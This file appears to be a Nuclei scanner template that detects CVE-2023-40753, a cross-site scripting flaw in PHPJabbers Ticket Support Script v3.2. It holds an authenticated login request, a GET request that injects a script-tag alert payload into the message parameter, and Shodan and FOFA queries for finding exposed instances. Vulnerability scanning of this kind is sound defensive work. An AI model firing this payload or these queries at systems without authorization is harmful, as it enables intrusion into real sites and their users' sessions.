58 lines
2.0 KiB
YAML
58 lines
2.0 KiB
YAML
id: CVE-2023-40753
|
|
|
|
info:
|
|
name: PHPJabbers Ticket Support Script v3.2 - Cross-Site Scripting
|
|
author: ritikchaddha
|
|
severity: medium
|
|
description: |
|
|
There is a Cross Site Scripting (XSS) vulnerability in the message parameter of index.php in PHPJabbers Ticket Support Script v3.2.
|
|
reference:
|
|
- https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-40753
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 5.4
|
|
cve-id: CVE-2023-40753
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:phpjabbers:ticket_support_script:3.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
shodan-query: html:"PHPJabbers"
|
|
fofa-query: body="PHPJabbers"
|
|
vendor: phpjabbers
|
|
product: ticket_support_script
|
|
tags: cve,cve2023,phpjabbers,ticket-support-script,xss,authenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /index.php?controller=pjBase&action=pjActionLogin HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
login_user=1&login_email={{username}}&login_password={{password}}&login_captcha=
|
|
|
|
- |
|
|
GET /notification_create=1&type=NewTicket&department_id%5B%5D=2&user_id%5B%5D=1&i18n%5B1%5D%5Bsubject%5D=a&i18n%5B1%5D%5Bmessage%5D=%3C%2Ftextarea%3E%3CscrIpt%3Ealert(document.domain)%3B%3C%2FscRipt%3E%3Ctextarea%3E HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- "</textarea><scrIpt>alert(document.domain);</scRipt><textarea>"
|
|
- "Subject"
|
|
- "Recipient users"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: content_type_2
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100b5e30d14909e56d27d4d6ba2eb80a538376145a576224e16260ddd6e9ded4d9c022100b98dea5283ad9109428af1ba26d77ec43c413121bd6c8f82ea7cdf1fc01e5846:922c64590222798bb761d5b6d8e72950 |